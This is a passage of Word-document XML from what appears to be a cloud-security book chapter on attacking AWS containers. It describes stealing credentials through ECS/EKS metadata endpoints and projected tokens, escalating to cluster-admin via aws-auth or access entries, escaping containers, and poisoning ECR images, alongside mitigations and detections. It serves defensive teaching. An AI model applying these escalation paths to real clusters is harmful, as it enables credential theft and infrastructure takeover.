          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--network host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, or with a high enough hop limit, or with the privileged flag), they steal the instance profile and escalate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D818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ECS-specific mitigation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ECS_AWSVPC_BLOCK_IMDS=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the agent config, blocks container access to host IMDS. Fewer than half of production ECS-on-EC2 clusters the authors have tested had this set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F69D7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.3  EKS: IRSA and Pod Identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C4DB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EKS has two official mechanisms to give a pod an IAM role: IAM Roles for Service Accounts (IRSA, the OIDC-federation-based approach) and Pod Identity (the newer, agent-based approach, GA in late 2023). Both are designed to avoid the node-profile shortcut — the node's instance profile is supposed to be minimally privileged and the pod's role is supposed to carry the actual permissions. But both have their own attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E8C4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IRSA.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The pod's service account is annotated with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eks.amazonaws.com/role-arn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a pod runs, the pod identity webhook injects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_ROLE_ARN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_WEB_IDENTITY_TOKEN_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and a projected service-account token. The AWS SDKs automatically perform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRoleWithWebIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, providing the projected token as the OIDC token. Attackers who achieve RCE in a pod instantly have these credentials. The token file is bind-mounted at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/var/run/secrets/eks.amazonaws.com/serviceaccount/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and valid until the pod restarts (or rotates, if a rotation period is configured).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302819A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Pod Identity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replaces the OIDC flow with a local agent that issues credentials through a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>169.254.170.23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> metadata endpoint (yes, a third link-local address). The agent is authenticated via a secret held by kubelet; attackers inside a pod simply GET the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C9BF9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1710717192"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Figure 13.1 — EKS identity plumbing: the three credentials paths visible to a pod. Whichever path the cluster is using, the pod's code can read the tokens/credentials directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA84872" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1197699541"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Pod (attacker RCE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container proces</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IRS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>A</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token on disk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sts:AssumeRoleWithWebIdentit</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Pod Identit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>y</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GET 169.254.170.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3</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agent-issued cred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Node IMDS (escape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xml:space="preserve">169.254.169.254 </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instance-profile cred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STS credential</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pod role OR node rol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Mitigations: NetworkPolicy egress, IMDSv2 with hop-limit 1, deny node-IMDS from pod</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p>
    <w:p w14:paraId="44EFFE9A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.4  aws-auth and the cluster-admin pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460734D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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> ConfigMap in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kube-system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">namespace maps IAM principals to Kubernetes RBAC groups. An attacker who can modify this ConfigMap (via the cluster's Kubernetes API, with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>system:masters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> group) can grant their own IAM role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cluster-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, which in turn grants them full control of every workload and every secret in the cluster. The Kubernetes-level RBAC defenders set up on top of this does not constrain writes to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> by anyone with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>system:masters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — and any IAM principal with EKS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eks:AccessKubernetesApi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> plus a cluster role binding of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cluster-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> has it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82B5E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Starting in late 2023, AWS introduced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>EKS access entries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a replacement for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. Access entries are managed via IAM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eks:AssociateAccessPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eks:UpdateAccessEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">). The attacker now looks for those two IAM actions instead of ConfigMap write: they are equally destructive. A single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssociateAccessPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> call associating the AWS-managed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AmazonEKSClusterAdminPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an attacker principal is the new cluster-admin primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A886529" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.5  Container escape primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9DA95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Container escape is not AWS-specific, but the effect in AWS is: a root escape from a container to the node grants the node's IAM role. The common escape classes are the usual suspects — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> passthrough with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, CAP_SYS_ADMIN with a pivot, kernel exploits (rare in managed node AMIs), and hostPath volume mounts. The AWS-specific twist is that the node's instance profile may be broader than the pod's service account, and the node may be authorized on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>system:nodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> member, which in turn authorizes kubelet-authenticated API access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44773BF6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.6  ECR and image-pull poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D442AC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Elastic Container Registry is the image source for most AWS-native container deployments. An attacker who can push to a tag that an ECS task definition or EKS deployment references (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:PutImage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:InitiateLayerUpload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:CompleteLayerUpload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:BatchCheckLayerAvailability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:BatchPutImage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) can pin a malicious image to that tag. The next pull — which happens when the task restarts, when the deployment rolls, or when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>imagePullPolicy: Always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> forces a re-pull — runs the attacker's image under the task/pod role. ECR image scanning is not a protection: scanning does not block pull, it only surfaces findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29E90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ECR repository policies are the cross-account primitive. If the attacker can write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:SetRepositoryPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, they can allow pushes from any principal, including attacker-controlled accounts — a quiet supply-chain backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DDE8D2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.7  Container-plane detections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39397F0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GuardDuty EKS Protection (runtime monitoring) and GuardDuty ECS Runtime Monitoring are the two platform-level container detections. They catch process-level anomalies (a shell opening in a container that does not usually have one; a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a metadata endpoint that does not usually make one). Coverage is good, in our experience, but false-positive rates are high enough that signal-to-noise often degrades in mature deployments, and many teams have runtime monitoring turned off after initial evaluation. Kubernetes audit logs in EKS (sent to CloudWatch Logs) capture every API call but require parsing and a detection layer that very few organizations have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA247A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6485D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ECS task metadata at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>169.254.170.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> has no PUT-token protection; SSRF-to-credential in an ECS container is easier than on modern EC2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373154A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ECS-on-EC2 containers can often reach host IMDS and escalate to the instance profile unless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ECS_AWSVPC_BLOCK_IMDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set.</w:t>
      </w:r>
    </w:p>
